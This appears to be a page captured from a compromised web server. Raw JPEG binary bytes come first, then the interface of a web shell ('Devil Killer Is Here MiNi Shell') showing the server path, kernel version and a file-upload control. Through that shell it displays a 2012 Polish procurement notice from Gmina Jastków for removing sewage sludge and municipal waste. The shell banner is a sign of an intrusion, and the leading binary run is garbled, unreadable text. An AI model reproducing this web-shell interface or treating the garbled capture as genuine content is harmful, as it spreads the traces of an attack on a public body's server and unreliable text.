JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121220/269845-N-2012.html

<p class="kh_header"><b>Jastków: Wywóz odpadów z terenu Gminy Jastków</b><br>
<b>Numer ogłoszenia: 269845 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jastków , Panieńszczyzna ul. Chmielowa 3, 21-002 Jastków, woj. lubelskie, tel. 081 5020143, faks 081 5020144.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jastkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz odpadów z terenu Gminy Jastków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
Przedmiotem zamówienia jest załadunek, wywóz i zagospodarowanie odwodnionych
częściowo higenizowanych osadów ściekowych z Oczyszczalni Ścieków w Snopkowie
Wykonawca będzie zobowiązany do realizacji następujących zadań;
- podstawienia kontenera na osady, załadunku kontenera z osadem na środki transportowe
- gospodarowania przedmiotowymi osadami przez co rozumie się wywóz mas osadowych poza
teren oczyszczalni, a następnie ich odzysk ( z wyłączeniem zagospodarowania osadów w gruncie)
lub unieszkodliwienie z zachowaniem wymogów określonych przepisami:
- ustawy z dnia 27.04.2001r. o odpadach (Dz.U. z 2010r. nr 185 poz. 1243) t.j.)
- Rozporządzenia Ministra Środowiska z dnia 13.07.2010r.w sprawie komunalnych osadów
ściekowych (Dz.U.z 2010r. Nr 137, poz. 924)
- ustawy z dnia 27.04.2001r. Prawo Ochrony Środowiska (Dz.U. z 2008r. nr 25, poz. 150 tj. z późn.
zm.)
Wybrany w drodze przetargu Wykonawca, posiadający wymagane przepisami prawa zezwolenie na
prowadzenie działalności w zakresie odzysku lub unieszkodliwienia odpadów, zgodnie z art. 25 ust.
3 ustawy o odpadach staje się posiadaczem odpadów z wszelkimi konsekwencjami wynikającymi z
przepisów w/w ustawy w tym zakresie, a w szczególności przejmuje odpowiedzialność za dalsze
postępowanie z osadami od momentu załadunku osadów na terenie oczyszczalni ścieków w
Snopkowie.
Wykonawca nie może powierzyć zamówienia podwykonawcom, ze względu na specyfikę
przedmiotu zamówienia w następującym zakresie:
1) prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów, w tym
komunalnych osadów ściekowych o kodzie 19 08 05, zgodnie z wymaganiami Ustawy z dnia
27.04.2001r. o odpadach,
2) prowadzenie działalności w zakresie transportu osadów ściekowych.
Przedmiotowy osad pochodzi z procesów oczyszczania ścieków w Oczyszczalni w Snopkowie.
Osad poddany jest biologicznej stabilizacji tlenowej oraz odwodnieniu na prasie.
Kod odpadu 19 08 05 ( ustabilizowane komunalne osady ściekowe)
Przewidywana ilość odwodnionego osadu do odbioru - ok. 500 Mg rocznie
Przewidywana ilość odbioru osadu w okresie 1 miesiąca - ok. 41,7 Mg
Zawartość suchej masy: - ok. 14,75 %
Zamawiający zastrzega sobie prawo do zmniejszenia ilości wywożonych osadów z przyczyn
spowodowanych głównie awariami, przestojami, ewentualnie przeznaczeniem części osadu do
rolniczego wykorzystania przez miejscowych rolników.
Osady poddawane są badaniom z częstotliwością i w zakresie zgodnym z Rozporządzeniem
Ministra Środowiska z dnia 13 lipca 2010r. w sprawie komunalnych osadów ściekowych (Dz.U. z
2010r. Nr 134, poz. 924).
Załadunek i odbiór osadu prowadzony będzie w cyklach miesięcznych. Poprzedzi go trwający ok. 3
doby proces odwodnienia na prasie. Osad będzie w procesie ciągłym transportowany taśmociągiem
do podstawionego kontenera. Wylot taśmociągu zlokalizowany jest na wys. ok. 2,5 m nad
poziomem terenu.
Rozliczenie płatności za odebrany osad odbywać się będzie na podstawie objętości urządzenia
służącego do jego okresowego gromadzenia
Wybrany Wykonawca jest zobowiązany do:
- przedłożenia aktualnej decyzji odpowiedniego organu, zezwalającej na prowadzenie działalności
w zakresie odzysku lub unieszkodliwienia odpadów, w tym komunalnych osadów ściekowych o
kodzie 19 08 05 zgodnie z wymaganiami Ustawy z dnia 27.04.2001r. o odpadach,
- przedstawić aktualną decyzję zezwalającą na transport osadów ściekowych, jeśli nie jest
zwolniony z uzyskania odrębnej decyzji w tym zakresie na mocy art. 32 Ustawy o odpadach
- przedstawić informację o miejscu wykorzystania przedmiotowych osadów z uwzględnieniem art.
9 Ustawy z dnia 27.04.2001r. o odpadach,
- przedstawić informację o sposobie gospodarowania przedmiotowymi osadami.
Zamawiający nie dopuszcza sposobów odzysku odpadów wyszczególnionych w art. 43 ust. 1,
pkt 1,4 i 5 ustawy z dnia 27.04.2001r. o odpadach.,
- zapewnić kontener do okresowego magazynowania osadu, załadunek oraz środki transportu do
wywozu przedmiotowych osadów z terenu oczyszczalni do miejsca zagospodarowania osadu.
- przyjąć odpowiedzialność za dalszy sposób postępowania z przedmiotowymi osadami zgodnie z
przedstawionym sposobem i miejscem ich zagospodarowania oraz ponieść wszelkie konsekwencje
prawne i finansowe z tym związane,
- rozliczać ilość wywożonych osadów:
Przekazać Zamawiającemu każdorazowo po zakończeniu miesiąca kalendarzowego Karty
Przekazania Odpadu zgodnie z Rozporządzeniem Ministra Środowiska z 08.12.2010r. w sprawie
wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz.U. z 2010r. Nr 249, poz.
1673)
Przed przystąpieniem do prasowania osadu Zamawiający zobowiązany jest powiadomić
Wykonawcę, co najmniej z 3-dniowym wyprzedzeniem o terminie rozpoczęcia prasowania i
wywozu osadów.
Część II
Przedmiotem zamówienia jest usługa wywozu odpadów o kodach 19 08 01 (skratki ok.10 Mg)
i 19 08 02 ( zawartość piaskowników ok. 14 Mg) w rozumieniu art. 3 ust.3 ustawy z dnia 27
kwietnia 2010r. o odpadach (Dz.U. z 2010, Nr 185, poz. 1243 ze zm.) wytworzonych na
oczyszczalni ścieków w Snopkowie ( ok.14Mg piasek i ok. 8Mg skratek) i oczyszczalni ścieków
w Tomaszowicach ( skratki ok. 2 Mg) oraz poddania ich procesowi odzysku lub
unieszkodliwienia.
Wykonawca będzie zobowiązany do gospodarowania przedmiotowymi odpadami z zachowaniem
wymogów określonych przepisami:
- ustawy z dnia 27.04.2001r. o odpadach (Dz.U. z 2010r. nr 185 poz. 1243) t.j.)
- ustawy z dnia 27.04.2001r. Prawo Ochrony Środowiska (Dz.U. z 2008r. nr 25, poz. 150 tj. z późn.
zm.)
Wybrany w drodze przetargu Wykonawca, posiadający wymagane przepisami prawa zezwolenie na
prowadzenie działalności w zakresie odzysku lub unieszkodliwienia odpadów, zgodnie z art. 25 ust.
3 ustawy o odpadach staje się posiadaczem odpadów z wszelkimi konsekwencjami wynikającymi z
przepisów w/w ustawy w tym zakresie, a w szczególności przejmuje odpowiedzialność za dalsze
postępowanie z odpadami od momentu załadunku odpadów na terenie oczyszczalni ścieków w
Snopkowie lub Tomaszowicach.
Potwierdzenie wykonania usługi wywozu i poddania odzyskowi lub unieszkodliwieniu odpadów
Wykonawca będzie zobowiązany przedłożyć w formie Karty Przekazania Odpadu zgodnie z
Rozporządzeniem Ministra Środowiska z 08.12.2010r. w sprawie wzorów dokumentów
stosowanych na potrzeby ewidencji odpadów (Dz.U. z 2010r. Nr 249, poz. 1673)
Odpady będą gromadzone w 3 pojemnikach :
a) oczyszczalnia ścieków w Snopkowie :
- jeden pojemnik na skratki i jeden na zawartość piaskowników
b) oczyszczalnia ścieków w Tomaszowicach
- jeden pojemnik na skratki,
Szacunkowa ilość kontenerów i pojemników przewidziana do opróżnienia w okresie trwania
zamówienia;
a) oczyszczalnia ścieków w Snopkowie
- zawartość piaskowników - 14 Mg ( 3,5 Mg na kwartał)
- skratki - 8 Mg ( 1,33 Mg co 2 miesiące)
b) oczyszczalnia ścieków w Tomaszowicach
- skratki - 2 Mg ( 0,33 Mg co 2 miesiące)
Wyposażenie nieruchomości w kontenery i pojemnik należy do wykonawcy.
Część III
Przedmiotem zamówienia jest usługa wywozu niesegregowanych odpadów komunalnych -
kod 20 03 01 w rozumieniu art. 3 ust.3 ustawy z dnia 27 kwietnia 2001r. o odpadach (D.U. z
2010r. Nr 185, poz. 1243 ze zm.) pochodzących z budynku Urzędu Gminy Jastków oraz
komunalnej oczyszczalni ścieków w Snopkowie oraz tzw. dzikich wysypisk do instalacji
regionalnej.
Miejsce deponowania odpadów - zgodnie z zapisami ustawy z dnia 13 września 1996r. o
utrzymaniu czystości i porządku w gminach ( Dz.U. 2012.391.tj), ustawy z dnia 27 kwietnia 2001r.
o odpadach ( tj.Dz.U. z 2010r. Nr 185, poz. 1243) oraz zapisami Planu Gospodarki Odpadami Dla
Województwa Lubelskiego 2017stanowiącego załącznik do uchwały Nr XXIV/396/2012 Sejmiku
Województwa z dnia 30 lipca 2012r.
Odpady pochodzące z budynku UG Jastków będą gromadzone w kontenerze KP-7 , odpady
pochodzące z tzw. dzikich wysypisk w kontenerze KP-7 podstawianym na dodatkowe zlecenie, z
kolei odpady pochodzące z oczyszczalni ścieków w Snopkowie w pojemniku 120l.
Szacunkowa ilość kontenerów i pojemników przewidziana do opróżnienia w okresie trwania
zamówienia;
- kontener KP-7 przy budynku UG Jastków - ok. 5 szt.,
- kontener KP-7 podstawiony na dodatkowe zlecenie - ok.6 szt., 
- pojemnik 120 l na terenie oczyszczalni ścieków w Snopkowie - ok. 6 szt.
Wyposażenie nieruchomości w kontenery i pojemnik należy do wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opis sposobu dokonywania oceny warunku nastąpi na podstawie weryfikacji oświadczenia
składanego na podstawie art. 44 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opis sposobu dokonywania oceny warunku nastąpi na podstawie weryfikacji oświadczenia
składanego na podstawie art. 44 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opis sposobu dokonywania oceny warunku nastąpi na podstawie weryfikacji oświadczenia
składanego na podstawie art. 44 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opis sposobu dokonywania oceny warunku nastąpi na podstawie weryfikacji oświadczenia
składanego na podstawie art. 44 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opis sposobu dokonywania oceny warunku nastąpi na podstawie weryfikacji oświadczenia
składanego na podstawie art. 44 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na
okres korzystania z nich przy wykonywaniu zamówienia, jeżeli wykonawca powołuje się przy
wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów,
które będą brały udział w realizacji zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na zasadach określonych we wzorze umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jastkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jastków, 21-002 Jastków, Panieńszczyzna ul.Chmielowa 3 pok. 4a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2012 godzina 10:00, miejsce: Urząd Gminy Jastków, 21-002 Jastków, Panieńszczyzna ul.Chmielowa 3 pok. 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Z przyczyn formalno-prawnych Zamawiający dopuszcza zmianę terminu rozpoczęcia wykonania
zamówienia z zastrzeżeniem granicznego terminu wykonania zamówienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Załadunek, wywóz i zagospodarowanie odwodnionych
częściowo higenizowanych osadów ściekowych z Oczyszczalni Ścieków w Snopkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca będzie zobowiązany do realizacji następujących zadań;
- podstawienia kontenera na osady, załadunku kontenera z osadem na środki transportowe
- gospodarowania przedmiotowymi osadami przez co rozumie się wywóz mas osadowych poza
teren oczyszczalni, a następnie ich odzysk ( z wyłączeniem zagospodarowania osadów w gruncie)
lub unieszkodliwienie z zachowaniem wymogów określonych przepisami:
- ustawy z dnia 27.04.2001r. o odpadach (Dz.U. z 2010r. nr 185 poz. 1243) t.j.)
- Rozporządzenia Ministra Środowiska z dnia 13.07.2010r.w sprawie komunalnych osadów
ściekowych (Dz.U.z 2010r. Nr 137, poz. 924)
- ustawy z dnia 27.04.2001r. Prawo Ochrony Środowiska (Dz.U. z 2008r. nr 25, poz. 150 tj. z późn.
zm.)
Wybrany w drodze przetargu Wykonawca, posiadający wymagane przepisami prawa zezwolenie na
prowadzenie działalności w zakresie odzysku lub unieszkodliwienia odpadów, zgodnie z art. 25 ust.
3 ustawy o odpadach staje się posiadaczem odpadów z wszelkimi konsekwencjami wynikającymi z
przepisów w/w ustawy w tym zakresie, a w szczególności przejmuje odpowiedzialność za dalsze
postępowanie z osadami od momentu załadunku osadów na terenie oczyszczalni ścieków w
Snopkowie.
Wykonawca nie może powierzyć zamówienia podwykonawcom, ze względu na specyfikę
przedmiotu zamówienia w następującym zakresie:
1) prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów, w tym
komunalnych osadów ściekowych o kodzie 19 08 05, zgodnie z wymaganiami Ustawy z dnia
27.04.2001r. o odpadach,
2) prowadzenie działalności w zakresie transportu osadów ściekowych.
Przedmiotowy osad pochodzi z procesów oczyszczania ścieków w Oczyszczalni w Snopkowie.
Osad poddany jest biologicznej stabilizacji tlenowej oraz odwodnieniu na prasie.
Kod odpadu 19 08 05 ( ustabilizowane komunalne osady ściekowe)
Przewidywana ilość odwodnionego osadu do odbioru - ok. 500 Mg rocznie
Przewidywana ilość odbioru osadu w okresie 1 miesiąca - ok. 41,7 Mg
Zawartość suchej masy: - ok. 14,75 %
Zamawiający zastrzega sobie prawo do zmniejszenia ilości wywożonych osadów z przyczyn
spowodowanych głównie awariami, przestojami, ewentualnie przeznaczeniem części osadu do
rolniczego wykorzystania przez miejscowych rolników.
Osady poddawane są badaniom z częstotliwością i w zakresie zgodnym z Rozporządzeniem
Ministra Środowiska z dnia 13 lipca 2010r. w sprawie komunalnych osadów ściekowych (Dz.U. z
2010r. Nr 134, poz. 924).
Załadunek i odbiór osadu prowadzony będzie w cyklach miesięcznych. Poprzedzi go trwający ok. 3
doby proces odwodnienia na prasie. Osad będzie w procesie ciągłym transportowany taśmociągiem
do podstawionego kontenera. Wylot taśmociągu zlokalizowany jest na wys. ok. 2,5 m nad
poziomem terenu.
Rozliczenie płatności za odebrany osad odbywać się będzie na podstawie objętości urządzenia
służącego do jego okresowego gromadzenia
Wybrany Wykonawca jest zobowiązany do:
- przedłożenia aktualnej decyzji odpowiedniego organu, zezwalającej na prowadzenie działalności
w zakresie odzysku lub unieszkodliwienia odpadów, w tym komunalnych osadów ściekowych o
kodzie 19 08 05 zgodnie z wymaganiami Ustawy z dnia 27.04.2001r. o odpadach,
- przedstawić aktualną decyzję zezwalającą na transport osadów ściekowych, jeśli nie jest
zwolniony z uzyskania odrębnej decyzji w tym zakresie na mocy art. 32 Ustawy o odpadach
- przedstawić informację o miejscu wykorzystania przedmiotowych osadów z uwzględnieniem art.
9 Ustawy z dnia 27.04.2001r. o odpadach,
- przedstawić informację o sposobie gospodarowania przedmiotowymi osadami.
Zamawiający nie dopuszcza sposobów odzysku odpadów wyszczególnionych w art. 43 ust. 1,
pkt 1,4 i 5 ustawy z dnia 27.04.2001r. o odpadach.,
- zapewnić kontener do okresowego magazynowania osadu, załadunek oraz środki transportu do
wywozu przedmiotowych osadów z terenu oczyszczalni do miejsca zagospodarowania osadu.
- przyjąć odpowiedzialność za dalszy sposób postępowania z przedmiotowymi osadami zgodnie z
przedstawionym sposobem i miejscem ich zagospodarowania oraz ponieść wszelkie konsekwencje
prawne i finansowe z tym związane,
- rozliczać ilość wywożonych osadów:
Przekazać Zamawiającemu każdorazowo po zakończeniu miesiąca kalendarzowego Karty
Przekazania Odpadu zgodnie z Rozporządzeniem Ministra Środowiska z 08.12.2010r. w sprawie
wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz.U. z 2010r. Nr 249, poz.
1673)
Przed przystąpieniem do prasowania osadu Zamawiający zobowiązany jest powiadomić
Wykonawcę, co najmniej z 3-dniowym wyprzedzeniem o terminie rozpoczęcia prasowania i
wywozu osadów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa wywozu odpadów o kodach 19 08 01 (skratki ok.10 Mg)
i 19 08 02 ( zawartość piaskowników ok. 14 Mg) w rozumieniu art. 3 ust.3 ustawy z dnia 27
kwietnia 2010r. o odpadach (Dz.U. z 2010, Nr 185, poz. 1243 ze zm.) wytworzonych na
oczyszczalni ścieków w Snopkowie ( ok.14Mg piasek i ok. 8Mg skratek) i oczyszczalni ścieków
w Tomaszowicach ( skratki ok. 2 Mg) oraz poddania ich procesowi odzysku lub
unieszkodliwienia.</p>
